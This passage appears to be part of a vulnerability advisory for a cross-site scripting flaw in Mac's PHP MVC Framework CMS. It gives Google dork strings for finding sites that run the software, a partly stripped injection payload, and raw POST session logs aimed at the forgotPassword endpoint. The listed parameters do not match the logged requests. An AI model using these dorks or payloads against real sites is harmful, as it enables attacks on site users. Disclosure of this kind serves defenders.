+[+] editRole + +Vulnerable Parameter(s): +[+] userId +[+] roleId + + +Proof of Concept (PoC): +======================= +Google Dork(s): intitle, subtitle & co. +Site Powered by Mac's PHP MVC Framework Framework of the future +Design downloaded from Zeroweb.org: Free website templates, layouts, and +tools. + + +1.1 +The non-persistent cross site scripting web vulnerability can be +exploited by remote attackers without user account and with low user +interaction. +For security demonstration or to reproduce the cross site scripting web +vulnerability follow the provided information and steps below to continue. + + +PoC: Payload +>">" + + + + +--- PoC Session Logs [POST] --- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 17 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true +- +POST: HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Content-Type: text/html; charset=ISO-8859-1 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +X-Powered-By-Plesk: PleskWin +Content-Length: 335 +- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 123 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true&=&emailAddress=test"